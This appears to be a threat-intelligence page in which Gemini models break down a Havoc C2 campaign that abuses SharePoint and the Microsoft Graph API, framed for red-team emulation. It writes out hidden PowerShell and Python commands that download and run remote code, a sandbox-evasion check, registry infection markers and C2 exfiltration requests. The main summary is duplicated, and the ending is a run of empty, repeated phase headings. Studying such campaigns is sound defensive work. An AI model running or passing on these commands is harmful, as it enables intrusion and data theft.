Procedure: After CheckIn, the agent accesses 2 files, {VictimID}pD9-tKout and {VictimID}pD9-tKin, in order to communicate with the C2. The agent updates the request to file {VictimID}pD9-tKout, then retrieves the response by accessing file {VictimID}pD9-tKin. The agent then erases the content immediately.
Procedure: The report highlights use of specific commands but states the commands supported are similar to that of Havoc github and included; gathering information, file operations, command & payload execution, token manipulation and Kerberos attacks.

Gemini 2.5

Gemini 2.5
Model: gemini-2.5-flash-preview-05-20 Here's a structured breakdown of the threat actor's procedures for red team emulation, focusing on tactics, techniques, and tools while excluding specific Indicators of Compromise (IOCs). Phase: Initial Access Technique: Phishing via Malicious HTML Attachment (ClickFix) Procedure: The attacker sends a phishing email with an attached HTML file designed to trick the recipient into manually executing a malicious PowerShell command. Tool: HTML ClickFix Phase: Execution Technique: PowerShell Command Execution Command: `powershell -w h -c "iwr '<SharePoint_Download_URL>' \| iex"` Note: The `-w h` hides the window, `-c` executes the command string, `iwr` (Invoke-WebRequest) downloads the remote script, and `iex` (Invoke-Expression) executes it. Technique: Sandbox Evasion (Environment Discovery) Command: `cmd.exe /c net group "domain computers" /domain \| find /c /v ""` Note: This command checks the number of domain computers to detect if the execution environment is a sandbox. If the count is below a threshold (e.g., 10), the script exits. Technique: Persistence / Infection Tagging (Registry Modification) Command: `Get-Item -Path 'HKCU:\Software\Microsoft' \| Get-ItemProperty \| Select-Object -ExcludeProperty PSPath,PSParentPath,PSChildName,PSDrive,PSProvider \| ForEach-Object { $_.PSObject.Properties \| Where-Object { $_.Name -like 'zr_' } \| ForEach-Object { Remove-ItemProperty -Path 'HKCU:\Software\Microsoft' -Name $_.Name -Force } }` Note:* This removes existing registry entries under `HKCU:\Software\Microsoft` that start with "zr_". `Set-ItemProperty -Path 'HKCU:\Software\Microsoft' -Name 'zr_<random_string>' -Value '<InfectionMarker_Value>' -Force` Note: This sets a new registry entry as an infection marker. Technique: Python Interpreter Download and Execution Procedure: The PowerShell script checks for the existence of `pythonw.exe`. If not found, it downloads a Python embeddable distribution. Command: `pythonw.exe -c "import urllib.request,ssl;url='<SharePoint_Python_Script_URL>';context=ssl.create_unverified_context();exec(urllib.request.urlopen(url,context=context).read().decode('utf-8'))"` Note: This executes a remote Python script from a SharePoint URL with a hidden window style. Tool: Python script (shellcode loader) Tool: KaynLdr (Github Shellcode Loader) Technique: Shellcode Loading / Reflective DLL Loading Procedure: The Python script loads and executes shellcode, which in turn reflectively loads an embedded DLL using KaynLdr. KaynLdr resolves necessary APIs and executes the DLL's entry point. Phase: Command and Control (C2) Tool: Modified Havoc Demon Agent DLL Technique: C2 Communication via Microsoft Graph API Procedure: The Havoc Demon Agent uses the Microsoft Graph API to obscure C2 communications within trusted services. Step 1: Access Token Acquisition: Sends a POST request to the Microsoft Identity Platform's `/token` endpoint to obtain access tokens for Microsoft Graph APIs, using a hardcoded shared secret. Step 2: C2 File Creation: Creates two files in the SharePoint site's default document library via PUT requests to store victim information and receive commands. File 1 (Victim Info): `PUT /v1.0/sites/<SharePointSite_Path>/drive/root:/<VictimID>pD9-tKout:/content` File 2 (C2 Commands): `PUT /v1.0/sites/<SharePointSite_Path>/drive/root:/<VictimID>pD9-tKin:/content` Step 3: Data Exfiltration (CheckIn): Sends initial CheckIn request containing victim's host name, user name, domain name, IP address, process details, OS information, elevated account status, and Demon DLL configuration. This data is encrypted (AES-256 CTR mode) and sent to the C2 via the victim info file. Step 4: Command Retrieval: Retrieves C2 commands from the C2 command file using a GET request to the Microsoft Graph API. `GET /v1.0/sites/<SharePointSite_Path>/drive/root:/<VictimID>pD9-tKin:/content` Note: The content of the C2 command file is immediately erased after retrieval. Technique: Task Management and Command Execution (Supported Havoc Demon Commands) Procedure: The agent sends a 'Get Job' request to the C2 and processes the response. If the received Command ID is not `DEMON_COMMAND_NO_JOB`, the task is decrypted and executed. Capabilities (Examples of Supported Commands): Gather information about the target (e.g., `COMMAND_CHECKIN`, `COMMAND_PROC`, `COMMAND_PROC_LIST`, `COMMAND_CONFIG`, `COMMAND_SCREENSHOT`). File operations (e.g., `COMMAND_FS`, `COMMAND_TRANSFER`). Command and payload execution (e.g., `COMMAND_INLINE_EXECUTE`, `COMMAND_ASSEMBLY_INLINE_EXECUTE`, `COMMAND_INJECT_DLL`, `COMMAND_INJECT_SHELLCODE`, `COMMAND_SPAWN_DLL`). Token manipulation (e.g., `COMMAND_TOKEN`). Network operations (e.g., `COMMAND_NET`, `COMMAND_SOCKET`, `COMMAND_PIVOT`). Kerberos Attacks (e.g., `COMMAND_KERBEROS`). Exiting the agent (e.g., `COMMAND_EXIT`). Sleeping (e.g., `COMMAND_SLEEP`).

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the threat actor's procedures for red team emulation, focusing on tactics, techniques, and tools while excluding specific Indicators of Compromise (IOCs).

Phase: Initial Access

Technique: Phishing via Malicious HTML Attachment (ClickFix)
Procedure: The attacker sends a phishing email with an attached HTML file designed to trick the recipient into manually executing a malicious PowerShell command.
Tool: HTML ClickFix

Phase: Execution

Technique: PowerShell Command Execution
Command: powershell -w h -c "iwr '<SharePoint_Download_URL>' | iex"
- Note: The -w h hides the window, -c executes the command string, iwr (Invoke-WebRequest) downloads the remote script, and iex (Invoke-Expression) executes it.
Technique: Sandbox Evasion (Environment Discovery)
Command: cmd.exe /c net group "domain computers" /domain | find /c /v ""
- Note: This command checks the number of domain computers to detect if the execution environment is a sandbox. If the count is below a threshold (e.g., 10), the script exits.
Technique: Persistence / Infection Tagging (Registry Modification)
Command:
- Get-Item -Path 'HKCU:\Software\Microsoft' | Get-ItemProperty | Select-Object -ExcludeProperty PSPath,PSParentPath,PSChildName,PSDrive,PSProvider | ForEach-Object { $_.PSObject.Properties | Where-Object { $_.Name -like 'zr_*' } | ForEach-Object { Remove-ItemProperty -Path 'HKCU:\Software\Microsoft' -Name $_.Name -Force } }
  - Note: This removes existing registry entries under HKCU:\Software\Microsoft that start with "zr_".
- Set-ItemProperty -Path 'HKCU:\Software\Microsoft' -Name 'zr_<random_string>' -Value '<InfectionMarker_Value>' -Force
  - Note: This sets a new registry entry as an infection marker.
Technique: Python Interpreter Download and Execution
Procedure: The PowerShell script checks for the existence of pythonw.exe. If not found, it downloads a Python embeddable distribution.
Command: pythonw.exe -c "import urllib.request,ssl;url='<SharePoint_Python_Script_URL>';context=ssl.create_unverified_context();exec(urllib.request.urlopen(url,context=context).read().decode('utf-8'))"
- Note: This executes a remote Python script from a SharePoint URL with a hidden window style.
Tool: Python script (shellcode loader)
Tool: KaynLdr (Github Shellcode Loader)
Technique: Shellcode Loading / Reflective DLL Loading
Procedure: The Python script loads and executes shellcode, which in turn reflectively loads an embedded DLL using KaynLdr. KaynLdr resolves necessary APIs and executes the DLL's entry point.

Phase: Command and Control (C2)

Tool: Modified Havoc Demon Agent DLL
Technique: C2 Communication via Microsoft Graph API
Procedure: The Havoc Demon Agent uses the Microsoft Graph API to obscure C2 communications within trusted services.
- Step 1: Access Token Acquisition: Sends a POST request to the Microsoft Identity Platform's /token endpoint to obtain access tokens for Microsoft Graph APIs, using a hardcoded shared secret.
- Step 2: C2 File Creation: Creates two files in the SharePoint site's default document library via PUT requests to store victim information and receive commands.
  - File 1 (Victim Info): PUT /v1.0/sites/<SharePointSite_Path>/drive/root:/<VictimID>pD9-tKout:/content
  - File 2 (C2 Commands): PUT /v1.0/sites/<SharePointSite_Path>/drive/root:/<VictimID>pD9-tKin:/content
- Step 3: Data Exfiltration (CheckIn): Sends initial CheckIn request containing victim's host name, user name, domain name, IP address, process details, OS information, elevated account status, and Demon DLL configuration. This data is encrypted (AES-256 CTR mode) and sent to the C2 via the victim info file.
- Step 4: Command Retrieval: Retrieves C2 commands from the C2 command file using a GET request to the Microsoft Graph API.
  - GET /v1.0/sites/<SharePointSite_Path>/drive/root:/<VictimID>pD9-tKin:/content
  - Note: The content of the C2 command file is immediately erased after retrieval.
Technique: Task Management and Command Execution (Supported Havoc Demon Commands)
Procedure: The agent sends a 'Get Job' request to the C2 and processes the response. If the received Command ID is not DEMON_COMMAND_NO_JOB, the task is decrypted and executed.
Capabilities (Examples of Supported Commands):
- Gather information about the target (e.g., COMMAND_CHECKIN, COMMAND_PROC, COMMAND_PROC_LIST, COMMAND_CONFIG, COMMAND_SCREENSHOT).
- File operations (e.g., COMMAND_FS, COMMAND_TRANSFER).
- Command and payload execution (e.g., COMMAND_INLINE_EXECUTE, COMMAND_ASSEMBLY_INLINE_EXECUTE, COMMAND_INJECT_DLL, COMMAND_INJECT_SHELLCODE, COMMAND_SPAWN_DLL).
- Token manipulation (e.g., COMMAND_TOKEN).
- Network operations (e.g., COMMAND_NET, COMMAND_SOCKET, COMMAND_PIVOT).
- Kerberos Attacks (e.g., COMMAND_KERBEROS).
- Exiting the agent (e.g., COMMAND_EXIT).
- Sleeping (e.g., COMMAND_SLEEP).

Havoc: SharePoint with Microsoft Graph API turns into FUD C2

Phase: Initial Access

Phase: Delivery

Phase: Command and Control

Phase: Evasion

Phase: Initial Access

Phase: Execution

Phase: Defense Evasion

Phase: Execution

Phase: Execution

Phase: Defense Evasion

Phase: Execution

Phase: Command-and-Control (C2) Setup

Steps:

Phase: Execution

Phase: Command and Control

Phase: Command and Control (C2) Communication

Phase: Command and Control

Phase: Execution

Phase: Credential Access

Phase: Persistence

Phase: Execution

Phase: C2 Communication

Phase: Defense Evasion

Model: gemini-2.0-flash

Phase: Initial Access

Phase: Execution

Phase: Persistence/Privilege Escalation

Phase: Command and Control

Phase: Exfiltration & Command Execution

Model: gemini-2.5-flash-preview-05-20

Phase: Initial Access

Phase: Execution

Phase: Command and Control (C2)